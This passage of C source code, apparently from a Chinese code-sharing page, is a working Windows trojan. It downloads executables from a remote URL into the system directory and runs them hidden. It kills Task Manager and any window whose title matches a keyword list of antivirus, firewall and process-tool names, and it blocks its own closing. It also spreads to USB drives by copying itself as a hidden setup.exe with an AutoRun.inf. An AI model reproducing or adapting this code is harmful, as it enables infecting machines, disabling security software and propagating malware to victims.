	{ 
		typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD ); 
		typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD); 
		typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID ); 
		typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ; 
		pInternetOpen InternetOpen=NULL; 
		pInternetOpenUrl InternetOpenUrl=NULL; 
		pInternetCloseHandle InternetCloseHandle=NULL; 
		pInternetReadFile InternetReadFile=NULL; 
		InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" ); 
		InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA"); 
		InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle"); 
		InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile"); 
		 
		hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0); 
		if (hInternet != NULL) 
		{ 
			hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0); 
			if (hUrlHandle!= NULL) 
			{ 
				memset(buf,0,9); 
				InternetReadFile(hUrlHandle, buf,8, &dwFlags); 
				InternetCloseHandle(hUrlHandle); 
				hUrlHandle = NULL; 
			} 
			InternetCloseHandle(hInternet); 
			hInternet = NULL; 
		} 
		FreeLibrary(hDll); 
		strcpy(Date,buf); 
		return true; 
	} 
	else 
		return false; 
} 
void DownFiles(char Url[]) 
{ 
	HMODULE hDll; 
	LPVOID hInternet,hUrlHandle;  
	char buf[100],test[101]; 
	DWORD dwFlags,dwSize; 
	 
	hDll = LoadLibrary("wininet.dll"); 
	if(hDll) 
	{ 
		typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD ); 
		typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD); 
		typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID ); 
		typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ; 
		pInternetOpen InternetOpen=NULL; 
		pInternetOpenUrl InternetOpenUrl=NULL; 
		pInternetCloseHandle InternetCloseHandle=NULL; 
		pInternetReadFile InternetReadFile=NULL; 
		InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" ); 
		InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA"); 
		InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle"); 
		InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile"); 
		 
		hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0); 
		if (hInternet != NULL) 
		{ 
			hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0); 
			if (hUrlHandle!= NULL) 
			{ 
				memset(buf,0,100); 
				InternetReadFile(hUrlHandle, buf,8, &dwSize);//先读取日期 
				do 
				{ 
					memset(buf,0,100); 
					if (!InternetReadFile(hUrlHandle, buf,100, &dwSize)) 
					{ 
						break; 
					} 
					if (dwSize<100) 
						break;  // Condition of dwSize=0 indicate EOF. Stop. 
					else 
					{ 
						memset(test,0,101); 
						if(strstr(buf,"|")!=NULL) 
						{ 
							strncpy(test,buf,strcspn(buf,"|")); 
						} 
						else 
						{ 
							strncpy(test,buf,100); 
						} 
						//MessageBox(NULL,test,NULL,MB_OK); 
						DownExec(test); 
					} 
					Sleep(1000); 
				}while (TRUE); 
				InternetCloseHandle(hUrlHandle); 
				hUrlHandle = NULL; 
			} 
			InternetCloseHandle(hInternet); 
			hInternet = NULL; 
		} 
		FreeLibrary(hDll); 
	} 
} 
 
void DownExec(char url[]) 
{ 
	char SysDirBuff[256], ArpFile[256]; 
	memset(ArpFile, 0, 256); 
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); 
	sprintf(ArpFile, "%s\\down.exe", SysDirBuff); 
 
	URLDownloadToFile(0, url, ArpFile, 0, 0); 
	    
    WinExec(ArpFile, SW_HIDE); 
 
} 
 
 
//************************************************* 
//************************************************* 
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)  
{  
	switch(message)  
	{  
	case WM_CREATE: 
		SetTimer(hWnd,1,1000,NULL); //设置一个1号定时器,时间间隔为1秒。   
		SetTimer(hWnd,2,modify_data.WaitTime*60*1000,NULL); //设置一个2号定时器,时间间隔为20分钟。 
		break; 
	case WM_TIMER:  
		{ 		 
			if(wParam==1) //1号定时器处理,关闭杀毒窗口 
			{ 
				if (!modify_data.IsAnti) 
					break; 
				 
				//设置注册表 
				//if (modify_data.IsReg) 
				{ 
					Register(); 
				} 
				 
				char hstr[MAX_PATH];  
				char str[MAX_PATH];  
				 
				POINT CurPoint;  
				HWND hCurrent,hParent; 			 
				GetCursorPos(&CurPoint);  
				hCurrent=WindowFromPoint(CurPoint); //取得鼠标所在的窗口句柄  
				hParent=hCurrent; 	 
				while(GetParent(hParent)!=NULL)  
					hParent=GetParent(hParent); //h为最上层的窗口句柄  
				 
				//测试是否有windows 任务管理器打开了。若有，则杀死！  
				if(FindWindow(NULL,"Windows 任务管理器")!=NULL) 
					PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);  
				 
				//hCurrent为鼠标所在的窗口句柄。h为鼠标所在的窗口最高层的窗口句柄.  
				GetWindowText(hParent,str,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！  
				GetWindowText(hCurrent,hstr,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU！  
				if((strstr(str,"安全卫士") ||  
					strstr(str,"扫描") || 
					strstr(str,"专杀") ||  
					strstr(str,"注册表") || 
					strstr(str,"Process") || 
					strstr(str,"进程") || 
					strstr(str,"毒") ||  
					strstr(str,"木马") ||  
					strstr(str,"防御") ||  
					strstr(str,"防火墙") ||  
					strstr(hstr,"病毒")||  
					strstr(hstr,"检测")|| 
					strstr(hstr,"Firewall")|| 
					strstr(hstr,"virus") || 
					strstr(hstr,"anti")||  
					strstr(hstr,"金山")||  
					strstr(hstr,"江民")||  
					strstr(hstr,"卡巴斯基")||  
					strstr(hstr,"worm")|| 
					strstr(hstr,"杀毒"))  
					&& hCurrent) 
				{//多搞几次，以防有漏网之鱼 
					PostMessage(hCurrent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口  
					PostMessage(hParent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口  
					PostMessage(hCurrent,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口  
					PostMessage(hParent,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口  
				}  
			} 
			else if(wParam==2) //2号定时器处理,下载文件并运行 
			{ 
				if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//可以下载 
				{ 
					if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样 
					{//表示需要下载文件 
						//DownFiles(modify_data.DownFile); 
						DownExec(modify_data.DownFile); 
						strcpy(DownFileDate1,DownFileDate2); 
					}	 
				} 
			} 
		} 
		break; 
	case WM_DEVICECHANGE://USB设备消息 
		if(modify_data.IsUpan) 
			OnDeviceChange(hWnd,wParam,lParam); 
		break; 
	case WM_CLOSE:  
		return FALSE; //不允许关闭该程序。  
	case WM_DESTROY:  
		return FALSE; //不能推毁该程序。 
	default: 
		return DefWindowProc(hWnd,message,wParam,lParam); 
	} 
	return 0; 
} 
 
  
//--------------Begin U盘传播---------------------------- 
BOOL CreateAutoRunFile(char*name,char *path) 
{ 
	FILE *out; 
	out=fopen(path,"w+"); 
	if(out) 
	{ 
		fprintf(out,"[AutoRun]\r\n"); 
	//	fprintf(out,"open=%s\r\n",name); 
		fprintf(out,"shell\open=打开(&O)\r\n",name); 
		fprintf(out,"shell\open\Command=%s\r\n",name); 
		fprintf(out,"shell\open\Default=1\r\n",name); 
		fprintf(out,"shell\explore=资源管理器(&X)\r\n",name); 
		fprintf(out,"shell\\explore\\command=%s\r\n",name); 
		fclose(out); 
		return TRUE; 
	} 
	else 
		return FALSE; 
} 
 
char FirstDriveFromMask(ULONG unitmask) 
{ 
	char i; 
	for (i = 0; i < 26; ++i) 
	{ 
		if (unitmask & 0x1)//看该驱动器的状态是否发生了变化 
			break; 
		unitmask = unitmask >> 1; 
	} 
	return (i + 'A'); 
} 
 
BOOL SetFileAttrib(char *path) 
{ 
	return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN); 
} 
 
BOOL CopyToUAndSet(char *U) 
{ 
	char This_File[256]; 
	memset(This_File,0,sizeof(This_File)); 
	::GetSystemDirectory(This_File,sizeof(This_File)); 
	strcat(This_File,"\\IME\\svchost.exe"); 
 
	char szPath[40]; 
	sprintf(szPath,"%c:\\setup.exe",U[0]);//得到指向U盘的完整目录 
	char szAutoFile[40]; 
	sprintf(szAutoFile,"%c:\\AutoRun.inf",U[0]); 
	if(CreateAutoRunFile("setup.exe",szAutoFile)) 
		SetFileAttrib(szAutoFile); 
	if(!CopyFile(This_File,szPath,FALSE)) 
		return FALSE; 
	return SetFileAttrib(szPath); 
} 
 
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam) 
{ 
	char U[4]; 
	PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam; 
	switch(wParam) 
	{ 
	case DBT_DEVICEARRIVAL: //插入 
		if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME) 
		{ 
			PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb; 
			U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符 
			CopyToUAndSet(U);//拷到u盘 
		} 
		break; 
	case DBT_DEVICEREMOVECOMPLETE: //设备删除 
		break; 
	} 
	return LRESULT(); 
} 
//--------------End U盘传播---------------------------- 
</pre>
<script src="/inc/gg_read2.js"></script><BR>
<script src="http://s117.cnzz.com/stat.php?id=1236358&web_id=1236358&show=pic" language="JavaScript" charset="gb2312"></script>
</body></html>